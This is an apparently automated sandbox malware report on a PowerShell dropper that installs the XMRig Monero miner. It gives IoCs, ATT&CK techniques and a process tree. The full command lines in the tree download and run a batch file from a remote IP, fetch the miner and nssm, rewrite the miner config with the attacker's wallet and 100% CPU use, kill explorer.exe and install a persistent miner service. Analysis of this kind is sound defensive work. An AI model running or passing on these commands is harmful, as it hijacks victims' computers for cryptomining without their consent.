xmrig | 8af9f59828228fc1c549acdd3d61c5b218ab7b7e37ac7ef5e383a7da4f3a3dfe

Analysis

max time kernel
1199s
max time network
1182s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
05/07/2024, 00:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.ps1
Size

148B
MD5

3ac844b877daa7a993d3881f95a5c5b7
SHA1

1b8bc001445332a6566ec0f2d74391c073d8aedc
SHA256

8af9f59828228fc1c549acdd3d61c5b218ab7b7e37ac7ef5e383a7da4f3a3dfe
SHA512

ea14f48f0ad9730d0143328af4b824452d4d5e6aa67af2d4f86a0f4f2cb0883295bc6fd94f2d30c726e1e44bf5ce6fccca43dae201d8932e765a3cdc634b0d1e

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.254.97.190:2024/test.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral1/files/0x000700000001ac2f-178.dat	family_xmrig
behavioral1/files/0x000700000001ac2f-178.dat	xmrig
behavioral1/memory/2504-181-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-463-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-464-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-465-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-466-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-467-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-468-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-469-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-470-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-471-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-472-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-473-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-474-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-475-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-476-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-477-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-478-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-479-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-480-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-481-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-482-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-483-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-484-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-485-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-486-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-487-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-488-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-489-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-490-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-491-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-492-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-493-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-494-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-495-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-496-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-497-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-498-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-500-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-501-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-502-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-503-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-504-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-505-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-506-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-507-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-508-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-509-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-510-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-511-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-512-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-513-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-514-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-515-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-516-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-517-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-518-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-519-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-520-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-521-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-522-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-523-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-524-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
1	3716	powershell.exe
3	1828	powershell.exe
5	1036	powershell.exe
8	704	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
2504	xmrig.exe
4768	nssm.exe
1660	nssm.exe
2024	nssm.exe
616	nssm.exe
4692	nssm.exe
3920	nssm.exe
3512	nssm.exe
3912	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
8	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1820	sc.exe
1360	sc.exe
1872	sc.exe
3944	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5068	powershell.exe
4492	powershell.exe
4820	powershell.exe
3964	powershell.exe
5080	powershell.exe
4764	powershell.exe
3716	powershell.exe
4232	powershell.exe
4740	powershell.exe
704	powershell.exe
4452	powershell.exe
1828	powershell.exe
1036	powershell.exe
2164	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
3708	timeout.exe
1120	timeout.exe
1380	Process not Found
2384	Process not Found
3480	Process not Found
4660	Process not Found
4232	timeout.exe
4796	timeout.exe
2500	timeout.exe
2396	Process not Found
5060	Process not Found
4008	Process not Found
5016	timeout.exe
1924	Process not Found
2608	Process not Found
3472	timeout.exe
2352	Process not Found
3480	timeout.exe
4616	timeout.exe
3468	Process not Found
4656	timeout.exe
3376	timeout.exe
3476	timeout.exe
208	timeout.exe
4616	timeout.exe
1088	timeout.exe
2796	timeout.exe
3552	timeout.exe
404	timeout.exe
5060	timeout.exe
2580	timeout.exe
2932	timeout.exe
4200	timeout.exe
4144	timeout.exe
3308	timeout.exe
2344	timeout.exe
1816	timeout.exe
1616	timeout.exe
1232	Process not Found
4016	timeout.exe
4408	Process not Found
3428	Process not Found
4616	timeout.exe
584	timeout.exe
1128	Process not Found
4148	Process not Found
516	Process not Found
844	Process not Found
4396	timeout.exe
828	Process not Found
5056	timeout.exe
3728	timeout.exe
2828	timeout.exe
2824	timeout.exe
3468	timeout.exe
2156	timeout.exe
2604	Process not Found
2160	Process not Found
2296	Process not Found
1464	Process not Found
2524	timeout.exe
4012	timeout.exe
3212	Process not Found
4260	Process not Found

Kills process with taskkill 2 IoCs

evasion

pid	Process
4380	taskkill.exe
3580	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

pid	Process
3716	powershell.exe
3716	powershell.exe
3716	powershell.exe
1828	powershell.exe
1828	powershell.exe
1828	powershell.exe
1036	powershell.exe
1036	powershell.exe
1036	powershell.exe
4232	powershell.exe
4232	powershell.exe
4232	powershell.exe
5068	powershell.exe
5068	powershell.exe
5068	powershell.exe
2164	powershell.exe
2164	powershell.exe
2164	powershell.exe
4492	powershell.exe
4492	powershell.exe
4492	powershell.exe
4820	powershell.exe
4820	powershell.exe
4820	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
5080	powershell.exe
5080	powershell.exe
5080	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
4740	powershell.exe
4740	powershell.exe
4740	powershell.exe
704	powershell.exe
704	powershell.exe
704	powershell.exe
4452	powershell.exe
4452	powershell.exe
4452	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	4380	taskkill.exe
Token: SeDebugPrivilege	1828	powershell.exe
Token: SeDebugPrivilege	3580	taskkill.exe
Token: SeDebugPrivilege	1036	powershell.exe
Token: SeDebugPrivilege	4232	powershell.exe
Token: SeDebugPrivilege	5068	powershell.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeDebugPrivilege	4492	powershell.exe
Token: SeDebugPrivilege	4820	powershell.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	5080	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	4740	powershell.exe
Token: SeDebugPrivilege	704	powershell.exe
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeLockMemoryPrivilege	3912	xmrig.exe
Token: SeIncreaseQuotaPrivilege	4272	WMIC.exe
Token: SeSecurityPrivilege	4272	WMIC.exe
Token: SeTakeOwnershipPrivilege	4272	WMIC.exe
Token: SeLoadDriverPrivilege	4272	WMIC.exe
Token: SeSystemProfilePrivilege	4272	WMIC.exe
Token: SeSystemtimePrivilege	4272	WMIC.exe
Token: SeProfSingleProcessPrivilege	4272	WMIC.exe
Token: SeIncBasePriorityPrivilege	4272	WMIC.exe
Token: SeCreatePagefilePrivilege	4272	WMIC.exe
Token: SeBackupPrivilege	4272	WMIC.exe
Token: SeRestorePrivilege	4272	WMIC.exe
Token: SeShutdownPrivilege	4272	WMIC.exe
Token: SeDebugPrivilege	4272	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4272	WMIC.exe
Token: SeRemoteShutdownPrivilege	4272	WMIC.exe
Token: SeUndockPrivilege	4272	WMIC.exe
Token: SeManageVolumePrivilege	4272	WMIC.exe
Token: 33	4272	WMIC.exe
Token: 34	4272	WMIC.exe
Token: 35	4272	WMIC.exe
Token: 36	4272	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4272	WMIC.exe
Token: SeSecurityPrivilege	4272	WMIC.exe
Token: SeTakeOwnershipPrivilege	4272	WMIC.exe
Token: SeLoadDriverPrivilege	4272	WMIC.exe
Token: SeSystemProfilePrivilege	4272	WMIC.exe
Token: SeSystemtimePrivilege	4272	WMIC.exe
Token: SeProfSingleProcessPrivilege	4272	WMIC.exe
Token: SeIncBasePriorityPrivilege	4272	WMIC.exe
Token: SeCreatePagefilePrivilege	4272	WMIC.exe
Token: SeBackupPrivilege	4272	WMIC.exe
Token: SeRestorePrivilege	4272	WMIC.exe
Token: SeShutdownPrivilege	4272	WMIC.exe
Token: SeDebugPrivilege	4272	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4272	WMIC.exe
Token: SeRemoteShutdownPrivilege	4272	WMIC.exe
Token: SeUndockPrivilege	4272	WMIC.exe
Token: SeManageVolumePrivilege	4272	WMIC.exe
Token: 33	4272	WMIC.exe
Token: 34	4272	WMIC.exe
Token: 35	4272	WMIC.exe
Token: 36	4272	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1500	WMIC.exe
Token: SeSecurityPrivilege	1500	WMIC.exe
Token: SeTakeOwnershipPrivilege	1500	WMIC.exe
Token: SeLoadDriverPrivilege	1500	WMIC.exe
Token: SeSystemProfilePrivilege	1500	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3912	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3716 wrote to memory of 3688	3716	powershell.exe	75
PID 3716 wrote to memory of 3688	3716	powershell.exe	75
PID 3688 wrote to memory of 4380	3688	cmd.exe	77
PID 3688 wrote to memory of 4380	3688	cmd.exe	77
PID 3688 wrote to memory of 1828	3688	cmd.exe	79
PID 3688 wrote to memory of 1828	3688	cmd.exe	79
PID 1828 wrote to memory of 2996	1828	powershell.exe	80
PID 1828 wrote to memory of 2996	1828	powershell.exe	80
PID 2996 wrote to memory of 4512	2996	cmd.exe	81
PID 2996 wrote to memory of 4512	2996	cmd.exe	81
PID 4512 wrote to memory of 4276	4512	net.exe	82
PID 4512 wrote to memory of 4276	4512	net.exe	82
PID 2996 wrote to memory of 1776	2996	cmd.exe	83
PID 2996 wrote to memory of 1776	2996	cmd.exe	83
PID 2996 wrote to memory of 2568	2996	cmd.exe	84
PID 2996 wrote to memory of 2568	2996	cmd.exe	84
PID 2996 wrote to memory of 5080	2996	cmd.exe	85
PID 2996 wrote to memory of 5080	2996	cmd.exe	85
PID 2996 wrote to memory of 652	2996	cmd.exe	86
PID 2996 wrote to memory of 652	2996	cmd.exe	86
PID 2996 wrote to memory of 996	2996	cmd.exe	87
PID 2996 wrote to memory of 996	2996	cmd.exe	87
PID 2996 wrote to memory of 1360	2996	cmd.exe	88
PID 2996 wrote to memory of 1360	2996	cmd.exe	88
PID 2996 wrote to memory of 1872	2996	cmd.exe	89
PID 2996 wrote to memory of 1872	2996	cmd.exe	89
PID 2996 wrote to memory of 3580	2996	cmd.exe	90
PID 2996 wrote to memory of 3580	2996	cmd.exe	90
PID 2996 wrote to memory of 1036	2996	cmd.exe	91
PID 2996 wrote to memory of 1036	2996	cmd.exe	91
PID 2996 wrote to memory of 4232	2996	cmd.exe	92
PID 2996 wrote to memory of 4232	2996	cmd.exe	92
PID 2996 wrote to memory of 5068	2996	cmd.exe	93
PID 2996 wrote to memory of 5068	2996	cmd.exe	93
PID 2996 wrote to memory of 2504	2996	cmd.exe	94
PID 2996 wrote to memory of 2504	2996	cmd.exe	94
PID 2996 wrote to memory of 1308	2996	cmd.exe	95
PID 2996 wrote to memory of 1308	2996	cmd.exe	95
PID 1308 wrote to memory of 2164	1308	cmd.exe	96
PID 1308 wrote to memory of 2164	1308	cmd.exe	96
PID 2164 wrote to memory of 4656	2164	powershell.exe	97
PID 2164 wrote to memory of 4656	2164	powershell.exe	97
PID 2996 wrote to memory of 4492	2996	cmd.exe	98
PID 2996 wrote to memory of 4492	2996	cmd.exe	98
PID 2996 wrote to memory of 4820	2996	cmd.exe	99
PID 2996 wrote to memory of 4820	2996	cmd.exe	99
PID 2996 wrote to memory of 3964	2996	cmd.exe	100
PID 2996 wrote to memory of 3964	2996	cmd.exe	100
PID 2996 wrote to memory of 5080	2996	cmd.exe	101
PID 2996 wrote to memory of 5080	2996	cmd.exe	101
PID 2996 wrote to memory of 4764	2996	cmd.exe	102
PID 2996 wrote to memory of 4764	2996	cmd.exe	102
PID 2996 wrote to memory of 4740	2996	cmd.exe	103
PID 2996 wrote to memory of 4740	2996	cmd.exe	103
PID 2996 wrote to memory of 704	2996	cmd.exe	104
PID 2996 wrote to memory of 704	2996	cmd.exe	104
PID 2996 wrote to memory of 4452	2996	cmd.exe	105
PID 2996 wrote to memory of 4452	2996	cmd.exe	105
PID 2996 wrote to memory of 3944	2996	cmd.exe	106
PID 2996 wrote to memory of 3944	2996	cmd.exe	106
PID 2996 wrote to memory of 1820	2996	cmd.exe	107
PID 2996 wrote to memory of 1820	2996	cmd.exe	107
PID 2996 wrote to memory of 4768	2996	cmd.exe	108
PID 2996 wrote to memory of 4768	2996	cmd.exe	108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\file.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\script_2777b63e.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3688
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4380
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://185.254.97.190:2024/test.txt', $tempfile); & $tempfile 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK; Remove-Item -Force $tempfile"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1828
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp77D0.tmp.bat" 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2996
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4512
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:4276
    - - C:\Windows\system32\where.exe
        
        where powershell
        5⤵
        
        PID:1776
    - - C:\Windows\system32\where.exe
        
        where find
        5⤵
        
        PID:2568
    - - C:\Windows\system32\where.exe
        
        where findstr
        5⤵
        
        PID:5080
    - - C:\Windows\system32\where.exe
        
        where tasklist
        5⤵
        
        PID:652
    - - C:\Windows\system32\where.exe
        
        where sc
        5⤵
        
        PID:996
    - - C:\Windows\system32\sc.exe
        
        sc stop moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:1360
    - - C:\Windows\system32\sc.exe
        
        sc delete moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:1872
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /t /im xmrig.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3580
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1036
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4232
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5068
    - - C:\Users\Admin\moneroocean\xmrig.exe
        
        "C:\Users\Admin\moneroocean\xmrig.exe" --help
        5⤵
        Executes dropped EXE
        
        PID:2504
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1308
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2164
        
        C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        7⤵
        
        PID:4656
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4492
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4820
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Uoklywyh\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3964
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5080
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4764
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4740
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:704
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4452
    - - C:\Windows\system32\sc.exe
        
        sc stop moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:3944
    - - C:\Windows\system32\sc.exe
        
        sc delete moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:1820
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
        5⤵
        Executes dropped EXE
        
        PID:4768
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
        5⤵
        Executes dropped EXE
        
        PID:1660
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
        5⤵
        Executes dropped EXE
        
        PID:2024
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
        5⤵
        Executes dropped EXE
        
        PID:616
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
        5⤵
        Executes dropped EXE
        
        PID:4692
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
        5⤵
        Executes dropped EXE
        
        PID:3920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3784
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4272
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3240
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1500
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4256
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3964
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1576
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1888
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4716
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
